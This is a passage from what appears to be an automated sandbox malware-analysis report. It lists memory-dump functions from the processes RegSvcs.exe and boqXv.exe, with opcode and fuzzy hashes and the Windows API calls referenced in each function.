Instruction Fuzzy Hash: C0917C70E00209CFEF14CFA9C8847AEBBF6BFD8714F148529E419A7294EB749845CB81

Function 067F42D0 Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4175180d11fce052cfff7f5ac64b8167803fb65f6a3bdeb806ed603bcb894e89
Instruction ID: 6707e6660710dbc4b52e211c772557507eac29ab9d4f0e31dcf16680db17f433
Opcode Fuzzy Hash: 4175180d11fce052cfff7f5ac64b8167803fb65f6a3bdeb806ed603bcb894e89
Instruction Fuzzy Hash: B6628D34A102058FDB54DB68D584BAEB7F2FF84310F148569EA06EB399DB35DC42CB91

Function 067FC088 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0475895eed20b2a33f530706585016bef02aa87c721f63bdb7195ce6accc4534
Instruction ID: 7c88146df07127a66828d8ac5c987d9829656f63c0d59cf835408283db749dd6
Opcode Fuzzy Hash: 0475895eed20b2a33f530706585016bef02aa87c721f63bdb7195ce6accc4534
Instruction Fuzzy Hash: 9E229F70B202098FDB55DB68D884AAEB7F2FF88310F248569D906DB391DB35DC45CB92

Function 01939810 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2696032675.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1930000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af36029cb26f6b6413ccfe1bcb895a7a7438c621227b068b95f11867aea0ea9
Instruction ID: 692ab55c93bb6a22da0633d9cb6b0d7468131ceb92077671c743c91b3fb6b4c6
Opcode Fuzzy Hash: 8af36029cb26f6b6413ccfe1bcb895a7a7438c621227b068b95f11867aea0ea9
Instruction Fuzzy Hash: 51128B34A002058FDB14DF68D984BAEBBB6FBC8315F248469E809DB395DB75DC41CB91

Function 067F5A58 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef703bfd295ee97ca45060f787d3a07b89b2319d7ec8eb26398336e91d3625ae
Instruction ID: 2f5aaa9b53ca4705d53512a0447f83828c4e640850d87fb1a21e70bb0ecc8ee5
Opcode Fuzzy Hash: ef703bfd295ee97ca45060f787d3a07b89b2319d7ec8eb26398336e91d3625ae
Instruction Fuzzy Hash: 6F02B130B202168FDB58DF68D594A6EB7E6FF84310F248529D905EB384DB36EC42CB91

Function 067FE0A0 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73784be08ef1daed55033a9ab2ee81403e409cbd336983cfb6390fc7e1917d15
Instruction ID: 2e82defd98228ba428e00b52e6e18327d2ff7bd1f2a20b78a55cb538fd2c0191
Opcode Fuzzy Hash: 73784be08ef1daed55033a9ab2ee81403e409cbd336983cfb6390fc7e1917d15
Instruction Fuzzy Hash: 23B1C370B042189FDB5CAB75A854A7E7BA7BFC8700B15C46EE507DB384CE349D0287A2

Function 01934AC8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2696032675.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1930000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0b1bd3e8736fd86b2f9a6d01a840e7abe3c085fbef59d4b762a9f0ab3b23da1
Instruction ID: 759d54b2865225d2c2bbf7d79b10a61ad8386c6ba050e59dbdea0376b166ff89
Opcode Fuzzy Hash: f0b1bd3e8736fd86b2f9a6d01a840e7abe3c085fbef59d4b762a9f0ab3b23da1
Instruction Fuzzy Hash: 74B15C70E00209CFDB24CFA9D8857EDBBF6AF88315F158529D819EB294EB759841CB81

Function 067EB690 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f3df9d3b678aac99973d966f6bb86247f3fc68940852497460542d8b99fae2
Instruction ID: bb8c7634380139c6762697c7fabbad20ab54b4bb5ee4bef4fd1cdb4b3324f89a
Opcode Fuzzy Hash: a1f3df9d3b678aac99973d966f6bb86247f3fc68940852497460542d8b99fae2
Instruction Fuzzy Hash: 4AC1D6B1411F46DBD710EF65F84C18B7BB2BB86324B708309D2A16B2E9DBB8154ACF44

Function 067E26C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 067E273E
GetCurrentThread.KERNEL32 ref: 067E277B
GetCurrentProcess.KERNEL32 ref: 067E27B8
GetCurrentThreadId.KERNEL32 ref: 067E2811

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f7d56b146facdbd3806deb7b059f1d50ac1d8adcd6c9ea82ac8183e27af4b82f
Instruction ID: df214ac097e0aba35e334e9d46c97a8b7857b61749879570ba9d93fa117f5093
Opcode Fuzzy Hash: f7d56b146facdbd3806deb7b059f1d50ac1d8adcd6c9ea82ac8183e27af4b82f
Instruction Fuzzy Hash: E85146B09003498FDB54DFAAD948BAEBBF5BB88310F20841DE419A7390D7345984CF66

Function 067E26BB Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 067E273E
GetCurrentThread.KERNEL32 ref: 067E277B
GetCurrentProcess.KERNEL32 ref: 067E27B8
GetCurrentThreadId.KERNEL32 ref: 067E2811

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 76207f8ab37f0f28abdd4361e6fee788bdeff671dc498c209fca445ceb8af2b8
Instruction ID: de6cddcebf60cc51570a7604db25ea41b70dec0a581fb4af92cea77faafd29dd
Opcode Fuzzy Hash: 76207f8ab37f0f28abdd4361e6fee788bdeff671dc498c209fca445ceb8af2b8
Instruction Fuzzy Hash: 4A5146B09003098FDB54DFA9D948BAEBBF5BB88311F20841DE419A7290D7345984CF66

Function 067EAD50 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 067EAFB6

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 82eb1e904520da23a945fac325299b8634fe2f7367594e40cf99b32f553cb514
Instruction ID: 18e9aeb92f023bb57ecfe8766b77d276b33a8c36d1d9a964f6cfa4fd08888fd6
Opcode Fuzzy Hash: 82eb1e904520da23a945fac325299b8634fe2f7367594e40cf99b32f553cb514
Instruction Fuzzy Hash: 9D8155B0A00B059FD7A4DF2AD44576ABBF1FF88300F108A2DD49AD7A50DB74E949CB91

Function 067ECF24 Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067ED042

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 788239d0b5cc34b00611c5b534d61946f15c49f57b25bd23c32ea300222f568a
Instruction ID: 5c53b7307d76b7013246e12306cbd1d37689c6958dc67b20c913aaeed201aea6
Opcode Fuzzy Hash: 788239d0b5cc34b00611c5b534d61946f15c49f57b25bd23c32ea300222f568a
Instruction Fuzzy Hash: 6151D0B5D10349EFDB14CF9AC884ADEBBB5BF88310F64852AE818AB250D7759845CF90

Function 067ECF30 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067ED042

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c8102533658c69e1b51df648781491a729f6cf27c96a00f7ca7107baeb35f7c2
Instruction ID: 1099555ca9c25cccdbd3ad5aa3ec2b20ea8ce7c994baeebc84340c3e1db95f01
Opcode Fuzzy Hash: c8102533658c69e1b51df648781491a729f6cf27c96a00f7ca7107baeb35f7c2
Instruction Fuzzy Hash: 3E41CFB1D10349DFDB14CF9AC884ADEFBB5BF88310F64812AE818AB250D7759845CF90

Function 067EA41C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 067EF741

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c17d7960a6a80b42cd90cd9ecb5c73020335d87af8482db6467c1c1e265696bf
Instruction ID: bebcf08fcac42f003aff04cefb948457b2547a6de888f9fbb1a18f8b2ef6ff4c
Opcode Fuzzy Hash: c17d7960a6a80b42cd90cd9ecb5c73020335d87af8482db6467c1c1e265696bf
Instruction Fuzzy Hash: 3A4136B89003498FDB54CF99C888AAABBF5FB8C314F25C459D519AB721D374A845CBA0

Function 067E2900 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067E298F

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cb5bda5a42da1c46fada2080b1e7994685e2dc401121002e60370246538dc666
Instruction ID: 3d434c248245837e18238e2c1096ebb52727ae0fd20e4c6b3447c65acf99462e
Opcode Fuzzy Hash: cb5bda5a42da1c46fada2080b1e7994685e2dc401121002e60370246538dc666
Instruction Fuzzy Hash: EE21E4B5D002499FDB10CFAAD884AEEBBF9FB48320F14841AE954A7350D374A954CF65

Function 067E2908 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067E298F

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1cc35a8545412987ba46fd9dd8f29b73d59aa711cd9380c9810ca7921ba0187e
Instruction ID: a3b28f5bea39a1bef5193b6c35265c5680d9a2a3d540aaf2c318734f1b446c78
Opcode Fuzzy Hash: 1cc35a8545412987ba46fd9dd8f29b73d59aa711cd9380c9810ca7921ba0187e
Instruction Fuzzy Hash: 4F21B3B59002499FDB10CFAAD884ADEBBF9FB48320F14841AE954A3250D374A954CF65

Function 01937349 Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 019373C0

Memory Dump Source

Source File: 00000002.00000002.2696032675.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1930000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: c4200e639cf4d23d2294cf5e16a3f335647d8dafacadc873f50be53eaba73c7b
Instruction ID: 01d0553fb2a064510a65c15934c62a68c676a9da6b36b1d45cc817cc4b4557a6
Opcode Fuzzy Hash: c4200e639cf4d23d2294cf5e16a3f335647d8dafacadc873f50be53eaba73c7b
Instruction Fuzzy Hash: 352177B1C0065A9BCB14DFAAD441BAEFBF4FF88320F148529D818A7240D338A900CFA1

Function 01937350 Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 019373C0

Memory Dump Source

Source File: 00000002.00000002.2696032675.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1930000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ad3da9158cfb3dff8468af43eafdf0f0897c0c5b6feaf034f0db3e2625766beb
Instruction ID: 795d3f0754431cfcf8029d658afc869daafc07a38cbd35bce24e876140fda402
Opcode Fuzzy Hash: ad3da9158cfb3dff8468af43eafdf0f0897c0c5b6feaf034f0db3e2625766beb
Instruction Fuzzy Hash: 7B1147B1C0065A9FDB14DF9AD445B9EFBF4BF88720F10812AD818A7640D778A944CFA5

Function 067FD6F4 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(BC24067B), ref: 067FE677

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b73084a8a5c7a5622c9fac8cfebdcf22ed0a9464afa9b44e197992477ebb0ed8
Instruction ID: 521dfe3f524400a4dae7774124dd24f66f0225a4591c290c76192b3a8da6f521
Opcode Fuzzy Hash: b73084a8a5c7a5622c9fac8cfebdcf22ed0a9464afa9b44e197992477ebb0ed8
Instruction Fuzzy Hash: C41136B1C0065A9BDB10DF9AC444BAEFBF4AF48620F11852AE914A7350D378A944CFA5

Function 067FE608 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(BC24067B), ref: 067FE677

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: dd57e5bf4896a0cf6b1ab0c1e7659342cc278d2da2f4611537e4353599cd0d95
Instruction ID: 3d41e1d29eae6fb47d896e4cddf1f8cf3e1c48292c1c795c42653273bcadee93
Opcode Fuzzy Hash: dd57e5bf4896a0cf6b1ab0c1e7659342cc278d2da2f4611537e4353599cd0d95
Instruction Fuzzy Hash: B51114B1C0065A9FDB10DF9AC844B9EFBF4BF48720F15812AE918A7350D778A944CFA5

Function 067EAF50 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 067EAFB6

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5d88bd68c109ae52538c07e05caa909cb3e08b7e0d7c9dbe9ad371c49fb33672
Instruction ID: de2790d3f00f1c8ca63c499223074686ed7008cf55fe13121ff44f220e2e866c
Opcode Fuzzy Hash: 5d88bd68c109ae52538c07e05caa909cb3e08b7e0d7c9dbe9ad371c49fb33672
Instruction Fuzzy Hash: C111E0B5C003498FDB10DF9AC844BDEFBF4AF88324F14842AD829A7650C379A545CFA5

Function 018ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2695837898.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_18ed000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5faa9c0e8b2d8479bc6cc4e56d9b443b9b6c0e9e6f6836eadef4dd58125e950
Instruction ID: 25cf957aed0f9b35376564da8723770819b4d4fc67ead2a90eded32c86f3793c
Opcode Fuzzy Hash: a5faa9c0e8b2d8479bc6cc4e56d9b443b9b6c0e9e6f6836eadef4dd58125e950
Instruction Fuzzy Hash: B7210075604304DFDB15DF54D888B16BFA1FB85314F28C66DD80A8B286C33AD50BCA62

Function 018ED006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2695837898.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_18ed000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04f578ac9f43de521457017620c2214f4530a91efe71486f495dd40393cfccc
Instruction ID: 96b45861624a1c0b900dcee03c859af5980f11128839bff14affd06f77973a82
Opcode Fuzzy Hash: e04f578ac9f43de521457017620c2214f4530a91efe71486f495dd40393cfccc
Instruction Fuzzy Hash: 662153755083849FCB02CF54D994711BFB1EB46314F28C5DAD8498F2A7C33A995ACB62

Non-executed Functions

Function 019341F8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\VHm, xrefs: 019344AF

Memory Dump Source

Source File: 00000002.00000002.2696032675.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1930000_RegSvcs.jbxd

Similarity

API ID:
String ID: \VHm
API String ID: 0-3272467948
Opcode ID: 036744ee6ab1f00704b625f85bcbd3115e7c0fede3fbb09fd02e6fa26902fcee
Instruction ID: c375dfd7182acdbedb41a7866410133bed4fe0013c8be28728fc4b279ca982cf
Opcode Fuzzy Hash: 036744ee6ab1f00704b625f85bcbd3115e7c0fede3fbb09fd02e6fa26902fcee
Instruction Fuzzy Hash: CAB15C70E00209CFDF14CFA9D8857ADBBF6AFC8715F158529E819EB294EB749841CB81

Function 067F5378 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeacd77736ccec383c519b18742f392c106aec239cb31426ab6c18b36995d70d
Instruction ID: f21a8d0dd4971f077f93004f501038818b57d23fad9b850bc0cd5618c7ca3afb
Opcode Fuzzy Hash: aeacd77736ccec383c519b18742f392c106aec239cb31426ab6c18b36995d70d
Instruction Fuzzy Hash: 55124C70E10219CFEB68DB65D854BAEB7B2FF98301F208569D50AAB354DB319D81CF90

Function 067F39D8 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698716914.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1213cc004a19fa24b1425582426d854a1870554a2573cfa3d4d9e15bff94b381
Instruction ID: 448596134822246323a57bdf851ada20211737b9c4dfa38be5c613715db9efa8
Opcode Fuzzy Hash: 1213cc004a19fa24b1425582426d854a1870554a2573cfa3d4d9e15bff94b381
Instruction Fuzzy Hash: E6E1D331B201148FDF54DB69D494EADBBE2EB89320F24856AE61ADB391CA31DC41CBD1

Function 067E8CF0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2698681111.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67e0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf4e56053686378f93e86b4c9f0898a4583dd5b0fe9ea433ccfc4a08a347ef7
Instruction ID: fbf873695e6b392bba22924007fda13f81fae4578904ae0f82e1576dd57b5989
Opcode Fuzzy Hash: ebf4e56053686378f93e86b4c9f0898a4583dd5b0fe9ea433ccfc4a08a347ef7
Instruction Fuzzy Hash: B8A17132E10205CFCF45DFB4C8445AEB7B2FF89310B15856AE916BB225EB35D95ACB80

Analysis Process: boqXv.exePID: 7884, Parent PID: 4084COMMON

Executed Functions

Function 021B1340 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e2c28c618c395fb0a72f5419ddfe4475c5d12f02efe6aa9a9a47949c30f475
Instruction ID: 94cc72099c239d220341635c915e820cd5159619b8fd73dc722d0a16ac6c5691
Opcode Fuzzy Hash: 25e2c28c618c395fb0a72f5419ddfe4475c5d12f02efe6aa9a9a47949c30f475
Instruction Fuzzy Hash: DC324E30B00205DFDB59EF74D8A066A77B6BFC9345F118929D61A8B398EB35EC41CB90

Function 021B0BC0 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc2756dc6d0f068f3c4dfea4a5082bda6eb0552e418ba612fe925ba23305013
Instruction ID: d975927983b5c7d4606b324a56a2c2aa13ffca3f989dff5d59f3fc7078d4d805
Opcode Fuzzy Hash: 5bc2756dc6d0f068f3c4dfea4a5082bda6eb0552e418ba612fe925ba23305013
Instruction Fuzzy Hash: DC818E35A00345CFDB2AAB70D85869EBBB2FF88310F15856ED516972A4DF71AC85CB80

Function 021B1230 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7edc6f83549659361e821798b9b30ca7d7017d6578301e5cb1b7dc9d67ea33
Instruction ID: aa6e82020654a1a312701dcc83b51926af6c010e3996a2c24173b36a58011978
Opcode Fuzzy Hash: 6e7edc6f83549659361e821798b9b30ca7d7017d6578301e5cb1b7dc9d67ea33
Instruction Fuzzy Hash: 5C3127757002108FCB59AB79C458A2D37F6AF8A71676204A8E506CF371DB32DC42CB90

Function 021B1240 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f44572fea19d2fa20835798d633c3d70ad8b64267fffb9647cb1e7a77bb9b2
Instruction ID: f36486fdc0edb347234e3fd1a22a2e6c1d6d462e2a4ad8da7a1edae9379a2d9b
Opcode Fuzzy Hash: 21f44572fea19d2fa20835798d633c3d70ad8b64267fffb9647cb1e7a77bb9b2
Instruction Fuzzy Hash: 7421F435740210CFCB99AB79C45892D77F6AF8AA1636108B8E506CF371DB36DC42CB80

Function 021B1C00 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c521ebdfa433db855865d7559bcdd86e4a331b4e971d34bdb279a4dc71000ee1
Instruction ID: 288a71eedff758fde6455b3b1058cd4d013e8e569600468b30554324d960569e
Opcode Fuzzy Hash: c521ebdfa433db855865d7559bcdd86e4a331b4e971d34bdb279a4dc71000ee1
Instruction Fuzzy Hash: AE118276E002459FCB41DFB4D8849AFBBB5FF89300B1186AAE519D7221E7719905CF90

Function 021B1C10 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187c5087763077aa4052c929ce131b1525c375ee1587936346870d448d113499
Instruction ID: 527075b6ef8752535ee344010880d011e821b34c62e2bc4c80bd580300a046fc
Opcode Fuzzy Hash: 187c5087763077aa4052c929ce131b1525c375ee1587936346870d448d113499
Instruction Fuzzy Hash: 03018036E002059FCB40EFB4D88489BFBB9FF89310711866AE619D7220E730A905CBA0

Function 021B0F9D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f9058d517a9f3af1c833ed587f6e472139d005bf8f9eff22fe9ad8c290a024
Instruction ID: 65e1470db37a093b3c370eb275f6cb9ead6bbe802de51034d05209319dda38dd
Opcode Fuzzy Hash: 05f9058d517a9f3af1c833ed587f6e472139d005bf8f9eff22fe9ad8c290a024
Instruction Fuzzy Hash: C6F015B5A40345DFEB15EB74C46C7AE7BB0BF48604F260898D406AB3A0CBB48884CB60

Function 021B0898 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5dc2d50aad47e571786587c88104f1de65f46f6d9ebe7b3392965dae8507547
Instruction ID: 14f08e8c858bfb953dc20cf5c4f3d834dc2e256c1c15d63df4986b7219523aeb
Opcode Fuzzy Hash: c5dc2d50aad47e571786587c88104f1de65f46f6d9ebe7b3392965dae8507547
Instruction Fuzzy Hash: 37E01AB1C01319AFCB91AFA898052DEBBF4FE09650F120579D61AE7200E7308B05CBD2

